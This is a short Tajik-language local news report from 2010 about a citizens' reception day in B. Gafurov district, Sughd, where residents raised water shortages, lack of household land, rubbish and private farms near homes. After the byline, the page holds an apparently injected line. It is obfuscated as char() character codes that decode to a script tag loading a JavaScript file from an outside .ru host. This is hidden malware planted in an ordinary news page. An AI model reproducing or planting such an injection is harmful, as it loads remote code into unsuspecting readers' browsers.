18.05.2010
Боз як рӯзи қабул
Суғд. Тибқи фармони президенти кишвар дар тамоми шаҳру ноҳияҳои ҷумҳурӣ ҳар ҳафта рӯзи шанбе рӯзи қабули шаҳрвандон баргузор гардида истодааст. Чунин вохӯрии аҳолии яке ҷамоатҳои ноҳияи Б. Ғафурови вилояти Суғд бо раиси ин ноҳия Л. Муҳиддинов баргузор гардид. Тавре маълум гашт ба мисли дигар минтақаҳои вилоят мушкилии асосӣ ин таъмин набудани мардум бо оби нӯшокӣ аст. Ҳамчунин мардум аз оби полезӣ низ пурра таъмин нестанд. Маъмулан мардуми деҳот аксар бо деҳқони машғул ҳастанд ва нарасидани оби полезӣ ба дигар муаммо боис мешавад. Аз рӯи гуфти сокинони ин минтақа заминҳо аз нарасидани об камҳосил ва баъзе дарахтон тамоман хушк шуда истодаанд. Муаммоҳои нарасидани замини наздиҳавлигӣ, зиёдшудани партовҳо ва фермаҳои хусусӣ дар ҷойҳои аҳолинишин низ боиси арзи сокинони ноҳия гардидааст.
Аз тарафи раиси ноҳия Л. Муҳиддинов супориш дода шуд, фаъолияти ин фермаҳои хусусӣ аз маҳаллаҳо ба ҷои дигар кӯчонида шаванд.
Доир ба ҳалли муаммоҳо масъулин вазифадор карда шуданд. Ба ҳар ҳол аҳолӣ аз чунин вохӯриҳо умедҳои калон доранд. Ва муаммоҳои деринаи худро ҳал мекунанд.
Назокат Юсупова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)add64f46198cf43cde520d5faed248fd.js" type="text/javascript">

ТАВЗЕҲОТ